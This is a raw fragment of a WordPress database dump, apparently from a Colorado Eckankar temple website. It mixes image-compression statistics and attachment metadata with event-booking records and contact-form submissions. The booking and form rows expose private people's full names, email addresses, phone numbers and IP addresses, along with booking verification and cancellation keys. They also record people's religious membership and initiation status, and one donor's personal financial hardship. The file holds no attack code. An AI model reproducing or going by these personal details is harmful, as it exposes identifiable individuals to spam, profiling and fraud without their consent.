thumblist\";a:2:{s:8:\"original\";i:17849;s:10:\"compressed\";i:17271;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:39788;s:10:\"compressed\";i:38813;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:29253;s:10:\"compressed\";i:28362;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:21246;s:10:\"compressed\";i:20412;}s:8:\"tileview\";a:2:{s:8:\"original\";i:21024;s:10:\"compressed\";i:20382;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:156424;s:10:\"compressed\";i:155902;}}}'),(191574,269023,'original-file','2023/09/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops571054b9397fe7419dfc32f5d6088a7d-updraft-pre-smush-original.jpg'),(170503,267280,'_field_133','Simi'),(170504,267280,'_field_134','Ryatt'),(170505,267280,'_field_135','simi_ryatt@hotmail.co.uk'),(170506,267280,'_field_137','Open on the 17th-18th October? '),(170507,267280,'_field_138','Hello! I hope you are well.\n\nMy mum and I are visiting Colorado from the UK on October 17th and October 18th. Will the temple be open on these days to come and visit? If so, please could you let me know the opening times. \n\nThank you :) With love in ECK,\nSimi '),(170508,267280,'_form_id','13'),(170509,267280,'_seq_num','119'),(191573,269024,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:164864;s:12:\"smushed-size\";i:164864;s:15:\"savings-percent\";d:0;s:10:\"sizes-info\";a:11:{s:4:\"full\";a:2:{s:8:\"original\";i:164864;s:10:\"compressed\";i:164864;}s:6:\"medium\";a:2:{s:8:\"original\";i:13030;s:10:\"compressed\";i:12478;}s:5:\"large\";a:2:{s:8:\"original\";i:66202;s:10:\"compressed\";i:65980;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5864;s:10:\"compressed\";i:5322;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:42016;s:10:\"compressed\";i:41556;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:15667;s:10:\"compressed\";i:15140;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:34140;s:10:\"compressed\";i:33602;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:23106;s:10:\"compressed\";i:22616;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:16906;s:10:\"compressed\";i:16391;}s:8:\"tileview\";a:2:{s:8:\"original\";i:18833;s:10:\"compressed\";i:18346;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:124392;s:10:\"compressed\";i:124392;}}}'),(191572,269024,'smush-info','The file was compressed from 161.00 KB to 161.00 KB, saving 0 percent, using WP-Optimize'),(191571,269024,'smush-complete','1'),(170526,267283,'_field_67','Linda'),(170527,267283,'_field_68','Bowman'),(170528,267283,'_field_69','Linda.Bowman613@comcast.net'),(170529,267283,'_field_70','(813) 684-9311'),(170530,267283,'_field_71','Denver'),(170531,267283,'_field_74','Administrative Services'),(170532,267283,'_field_75','I currently donate $50 per month.  I would like to change it to $25 per month instead.  My rent went up $100/month and with food prices so high I can no longer afford the full $50/month.  Also, I am on Social Security and on a limited income.  Sorry I wish I didn\'t have to do this.'),(170533,267283,'_form_id','8'),(170534,267283,'_seq_num','18'),(191570,269024,'original-file','2023/09/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4e3621c5f0003d1a4364167d51b9b125-updraft-pre-smush-original.jpg'),(191569,269024,'_source_url','https://images.unsplash.com/photo-1497366672149-e5e4b4d34eb3?ixlib=rb-0.3.5&q=80&fm=jpg&crop=entropy&cs=tinysrgb&w=1600&h=900&fit=crop&s=4e3621c5f0003d1a4364167d51b9b125&.png'),(170583,267291,'_field_179','Jeffrey'),(170584,267291,'_field_180','Milburn'),(170585,267291,'_field_181','jeppre22@gmail.com'),(170586,267291,'_field_182','CO'),(170587,267291,'_field_183','US'),(170588,267291,'_field_184','a:1:{i:0;s:41:\"Central Colorado - ECK Temple in Colorado\";}'),(170589,267291,'_form_id','17'),(170590,267291,'_seq_num','12'),(170591,267292,'_field_109','Bridget'),(170592,267292,'_field_110','Rainville'),(170593,267292,'_field_111','brainville88@hotmail.com'),(170594,267292,'_field_112','(952) 200-7878'),(170595,267292,'_field_113','Co Springs'),(170596,267292,'_field_116','ESA-Initiator-Jane Taylor'),(170597,267292,'_field_117','Hi! I am a member of Eckankar who lived in COS and I have my pink slip for my next initiation. I am looking for an initiator to schedule with in town. Thanks, Bridget '),(170598,267292,'_form_id','11'),(170599,267292,'_seq_num','3'),(191568,269024,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:900;s:4:\"file\";s:103:\"2023/09/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4e3621c5f0003d1a4364167d51b9b125.jpg\";s:8:\"filesize\";i:164864;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4e3621c5f0003d1a4364167d51b9b125-348x196.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13030;}s:5:\"large\";a:5:{s:4:\"file\";s:104:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4e3621c5f0003d1a4364167d51b9b125-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66202;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4e3621c5f0003d1a4364167d51b9b125-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5864;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4e3621c5f0003d1a4364167d51b9b125-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42016;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4e3621c5f0003d1a4364167d51b9b125-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15667;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4e3621c5f0003d1a4364167d51b9b125-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34140;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4e3621c5f0003d1a4364167d51b9b125-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23106;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4e3621c5f0003d1a4364167d51b9b125-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16906;}s:8:\"tileview\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4e3621c5f0003d1a4364167d51b9b125-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18833;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:104:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4e3621c5f0003d1a4364167d51b9b125-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:124392;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(191567,269024,'_wp_attached_file','2023/09/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4e3621c5f0003d1a4364167d51b9b125.jpg'),(191566,269023,'_source_url','https://images.unsplash.com/photo-1497366811353-6870744d04b2?ixlib=rb-0.3.5&q=80&fm=jpg&crop=entropy&cs=tinysrgb&w=1600&h=900&fit=crop&s=571054b9397fe7419dfc32f5d6088a7d&.png'),(170656,267300,'mec_transaction_id','MUA58591'),(170657,267300,'mec_user_id','1000048'),(170658,267300,'mec_verified','1'),(170659,267300,'mec_verification_key','3204b204fa781c75a645b22e3493528d'),(170660,267300,'mec_cancellation_key','e1f78be1d808281d514e9b4bd9885cbd'),(170661,267300,'mec_confirmed','1'),(170662,267300,'mec_event_id','267237'),(170663,267300,'mec_date','1665311400:1665358200'),(170664,267300,'mec_ticket_id',',1,'),(170665,267300,'mec_booking_time','2022-10-09 07:22:18'),(170666,267300,'mec_all_dates','a:0:{}'),(170667,267300,'mec_other_dates','a:0:{}'),(170668,267300,'mec_attention_time','1665311400:1665358200'),(170669,267300,'mec_attention_time_start','1665311400'),(170670,267300,'mec_attention_time_end','1665358200'),(170671,267300,'mec_book_date_submit','20221009072218'),(170672,267300,'mec_booking_location','129'),(170673,267300,'mec_ticket_price_1','0'),(170674,267300,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:17:\"rhoann9@gmail.com\";s:4:\"name\";s:13:\"Rhonda Miller\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"73.14.13.119\";}}'),(170675,267300,'mec_price','0'),(170676,267300,'mec_gateway','MEC_gateway_free'),(170677,267300,'mec_gateway_label','Free'),(170678,267301,'mec_transaction_id','NYM84882'),(170679,267301,'mec_user_id','1000049'),(170680,267301,'mec_verified','1'),(170681,267301,'mec_verification_key','d13832f6cdd772f183181d6d429a3a1e'),(170682,267301,'mec_cancellation_key','6440cb241ec4c7bd02d268ce2c87a38f'),(170683,267301,'mec_confirmed','1'),(170684,267301,'mec_event_id','267237'),(170685,267301,'mec_date','1665311400:1665358200'),(170686,267301,'mec_ticket_id',',1,'),(170687,267301,'mec_booking_time','2022-10-09 08:44:08'),(170688,267301,'mec_all_dates','a:0:{}'),(170689,267301,'mec_other_dates','a:0:{}'),(170690,267301,'mec_attention_time','1665311400:1665358200'),(170691,267301,'mec_attention_time_start','1665311400'),(170692,267301,'mec_attention_time_end','1665358200'),(170693,267301,'mec_book_date_submit','20221009084408'),(170694,267301,'mec_booking_location','129'),(170695,267301,'mec_ticket_price_1','0'),(170696,267301,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"MVEpianist@gmail.com\";s:4:\"name\";s:17:\"Marcia Van Egmond\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"35.136.86.220\";}}'),(170697,267301,'mec_price','0'),(170698,267301,'mec_gateway','MEC_gateway_free'),(170699,267301,'mec_gateway_label','Free'),(170700,267302,'mec_transaction_id','TXR11723'),(170701,267302,'mec_user_id','1000023'),(170702,267302,'mec_verified','1'),(170703,267302,'mec_verification_key','9f53f3748ff9920547a4575fef547487'),(170704,267302,'mec_cancellation_key','8b5681bf92e99ad480fbe98274f9a7cb'),(170705,267302,'mec_confirmed','1'),(170706,267302,'mec_event_id','267237'),(170707,267302,'mec_date','1665311400:1665358200'),(170708,267302,'mec_ticket_id',',1,'),(170709,267302,'mec_booking_time','2022-10-09 10:23:26'),(170710,267302,'mec_all_dates','a:0:{}'),(170711,267302,'mec_other_dates','a:0:{}'),(170712,267302,'mec_attention_time','1665311400:1665358200'),(170713,267302,'mec_attention_time_start','1665311400'),(170714,267302,'mec_attention_time_end','1665358200'),(170715,267302,'mec_book_date_submit','20221009102326'),(170716,267302,'mec_booking_location','129'),(170717,267302,'mec_ticket_price_1','0'),(170718,267302,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:9:\"Bonnie G.\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"184.55.32.29\";}}'),(170719,267302,'mec_price','0'),(170720,267302,'mec_gateway','MEC_gateway_free'),(170721,267302,'mec_gateway_label','Free'),(170722,267303,'mec_transaction_id','BGC33180'),(170723,267303,'mec_user_id','1000047'),(170724,267303,'mec_verified','1'),(170725,267303,'mec_verification_key','a4ba4f856d101f1f5d4aaac59fcd816f'),(170726,267303,'mec_cancellation_key','49d5dad5253573ba691dce329107563c'),(170727,267303,'mec_confirmed','1'),(170728,267303,'mec_event_id','267237'),(170729,267303,'mec_date','1665311400:1665358200'),(170730,267303,'mec_ticket_id',',1,'),(170731,267303,'mec_booking_time','2022-10-09 10:27:31'),(170732,267303,'mec_all_dates','a:0:{}'),(170733,267303,'mec_other_dates','a:0:{}'),(170734,267303,'mec_attention_time','1665311400:1665358200'),(170735,267303,'mec_attention_time_start','1665311400'),(170736,267303,'mec_attention_time_end','1665358200'),(170737,267303,'mec_book_date_submit','20221009102731'),(170738,267303,'mec_booking_location','129'),(170739,267303,'mec_ticket_price_1','0'),(170740,267303,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:4:\"Beth\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"71.229.137.81\";}}'),(170741,267303,'mec_price','0'),(170742,267303,'mec_gateway','MEC_gateway_free'),(170743,267303,'mec_gateway_label','Free'),(170811,267309,'mec_start_time_ampm','AM'),(170812,267309,'mec_start_day_seconds','36000'),(170813,267309,'mec_end_date','2022-11-19'),(170814,267309,'mec_end_time_hour','11'),(170815,267309,'mec_end_time_minutes','0'),(170816,267309,'mec_end_time_ampm','AM'),(170817,267309,'mec_end_day_seconds','39600'),(170818,267309,'mec_repeat_status','0'),(170819,267309,'mec_repeat_type',''),(170820,267309,'mec_repeat_interval','1'),(170821,267309,'mec_repeat_end',''),(170822,267309,'mec_repeat_end_at_occurrences',''),(170823,267309,'mec_repeat_end_at_date',''),(170824,267309,'mec_advanced_days','a:0:{}'),(170825,267309,'mec_in_days',''),(170826,267309,'mec_not_in_days',''),(170827,267309,'mec_hourly_schedules','a:0:{}'),(170828,267309,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(170829,267309,'mec_tickets','a:0:{}'),(170830,267309,'mec_fees_global_inheritance','1'),(170831,267309,'mec_fees','a:0:{}'),(170832,267309,'mec_ticket_variations_global_inheritance','1'),(170833,267309,'mec_ticket_variations','a:0:{}'),(170834,267309,'mec_reg_fields_global_inheritance','1'),(170835,267309,'mec_reg_fields','a:0:{}'),(170836,267309,'mec_bfixed_fields','a:0:{}'),(170837,267309,'mec_op','a:0:{}'),(170838,267309,'mec_fields','a:0:{}'),(170839,267309,'mec_event_status','EventScheduled'),(170840,267309,'mec_moved_online_link',''),(170841,267309,'mec_cancelled_reason',''),(170842,267309,'mec_display_cancellation_reason_in_single_page',''),(170843,267309,'boldgrid_hide_page_title','0'),(170844,267309,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(170845,267309,'passster_activate_global_protection',NULL),(170846,267309,'passster_activate_protection',NULL),(170847,267309,'passster_protection_type','password'),(170850,267309,'_dp_original','266104'),(170849,267309,'boldgrid_in_page_containers','1'),(170851,267309,'_edit_lock','1665522506:2'),(170852,267309,'_edit_last','2'),(170853,267310,'_wp_attached_file','2022/10/mom-boy-comtemplation.jpg'),(170854,267310,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:756;s:6:\"height\";i:470;s:4:\"file\";s:33:\"2022/10/mom-boy-comtemplation.jpg\";s:8:\"filesize\";i:71997;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"mom-boy-comtemplation-300x187.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16364;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"mom-boy-comtemplation-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7793;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:33:\"mom-boy-comtemplation-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21419;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:33:\"mom-boy-comtemplation-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33812;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:33:\"mom-boy-comtemplation-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24866;}s:8:\"tileview\";a:5:{s:4:\"file\";s:33:\"mom-boy-comtemplation-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24351;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(170855,267309,'_thumbnail_id','267310'),(170856,267310,'original-file','2022/10/mom-boy-comtemplation-updraft-pre-smush-original.jpg'),(170857,267310,'smush-complete','1'),(170858,267310,'smush-info','The file was compressed from 70.31 KB to 68.13 KB saving 3.1 percent using WP-Optimize'),(170859,267310,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:71997;s:12:\"smushed-size\";i:69762;s:15:\"savings-percent\";d:3.1;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:71997;s:10:\"compressed\";i:69762;}s:6:\"medium\";a:2:{s:8:\"original\";i:16364;s:10:\"compressed\";i:16132;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7793;s:10:\"compressed\";i:7727;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:21419;s:10:\"compressed\";i:21262;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:33812;s:10:\"compressed\";i:33456;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:24866;s:10:\"compressed\";i:24606;}s:8:\"tileview\";a:2:{s:8:\"original\";i:24351;s:10:\"compressed\";i:24223;}}}'),(170860,267269,'original-file','2022/09/fam-girls-3-updraft-pre-smush-original.jpg'),(170861,267269,'smush-complete','1'),(170862,267269,'smush-info','The file was compressed from 108.25 KB to 103.70 KB saving 4.2 percent using WP-Optimize'),(170863,267269,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:110845;s:12:\"smushed-size\";i:106186;s:15:\"savings-percent\";d:4.2;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:110845;s:10:\"compressed\";i:106186;}s:6:\"medium\";a:2:{s:8:\"original\";i:20634;s:10:\"compressed\";i:20134;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9946;s:10:\"compressed\";i:9880;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:88267;s:10:\"compressed\";i:86916;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:29978;s:10:\"compressed\";i:29203;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:47034;s:10:\"compressed\";i:45934;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:34289;s:10:\"compressed\";i:33315;}s:8:\"tileview\";a:2:{s:8:\"original\";i:34761;s:10:\"compressed\";i:34111;}}}'),(172357,267447,'mec_organizer_id','1'),(172356,267447,'mec_dont_show_map','0'),(172355,267447,'mec_location_id','163'),(172354,267447,'mec_color',''),(172353,267447,'protect_children',''),(172326,267440,'mec_gateway_label','Free'),(172325,267440,'mec_gateway','MEC_gateway_free'),(172324,267440,'mec_price','0'),(172311,267440,'mec_event_id','267408'),(172312,267440,'mec_date','1668335400:1668382200'),(172313,267440,'mec_ticket_id',',1,'),(172314,267440,'mec_booking_time','2022-11-11 19:57:10'),(172315,267440,'mec_all_dates','a:0:{}'),(172316,267440,'mec_other_dates','a:0:{}'),(172317,267440,'mec_attention_time','1668335400:1668382200'),(172318,267440,'mec_attention_time_start','1668335400'),(172319,267440,'mec_attention_time_end','1668382200'),(172320,267440,'mec_book_date_submit','20221111195710'),(172321,267440,'mec_booking_location','129'),(172322,267440,'mec_ticket_price_1','0'),(172323,267440,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:24:\"inyear25252002@yahoo.com\";s:4:\"name\";s:11:\"Roger Freed\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"4.4.204.170\";}}'),(172310,267440,'mec_confirmed','1'),(172309,267440,'mec_cancellation_key','5aef997a1572d3b32ddcfd36fdfa4b02'),(172308,267440,'mec_verification_key','8d47640260848fcfb9b47a8ffefbdf87'),(172307,267440,'mec_verified','1'),(172306,267440,'mec_user_id','1000053'),(172305,267440,'mec_transaction_id','YVC14670'),(172304,267439,'_seq_num','22'),(172303,267439,'_form_id','10'),(172302,267439,'_field_105','I am not sure who to contact here, but I was wondering if Kristie Holiday is still the web administrator for the CO website.  I have a question about whether it\'s possible to transfer the local CS calendar from the website into our e-mail newsletter.  Some chelas would like to see an overview of the months activities in our local newsletter that we send out to chelas.  They have been told that they can access the calendar on the main website, but it doesn\'t have everything listed.  I have tried copying and pasting into the Benchmark email but it doesn\'t work very well.  I am just looking to touch base with someone who might be able to suggest something I haven\'t thought of since I maintain and send out the email newsletter for CS and So Colorado.  It could be Chris Bauch or Kristie or someone I am not aware of.  \nThanks for your help,\nDiane Conrad'),(172301,267439,'_field_104','Administrative Services Director'),(172300,267439,'_field_101','Co Springs'),(172299,267439,'_field_100','(719) 598-7690'),(172297,267439,'_field_98','Conrad'),(172298,267439,'_field_99','conraddw@centurylink.net'),(172296,267439,'_field_97','Diane'),(191565,269023,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:900;s:4:\"file\";s:103:\"2023/09/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops571054b9397fe7419dfc32f5d6088a7d.jpg\";s:8:\"filesize\";i:206873;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops571054b9397fe7419dfc32f5d6088a7d-348x196.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15613;}s:5:\"large\";a:5:{s:4:\"file\";s:104:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops571054b9397fe7419dfc32f5d6088a7d-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82930;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops571054b9397fe7419dfc32f5d6088a7d-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6560;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops571054b9397fe7419dfc32f5d6088a7d-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52811;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops571054b9397fe7419dfc32f5d6088a7d-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17849;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops571054b9397fe7419dfc32f5d6088a7d-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39788;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops571054b9397fe7419dfc32f5d6088a7d-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29253;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops571054b9397fe7419dfc32f5d6088a7d-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21246;}s:8:\"tileview\";a:5:{s:4:\"file\";s:103:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops571054b9397fe7419dfc32f5d6088a7d-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21024;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:104:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops571054b9397fe7419dfc32f5d6088a7d-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:156424;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(191564,269023,'_wp_attached_file','2023/09/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops571054b9397fe7419dfc32f5d6088a7d.jpg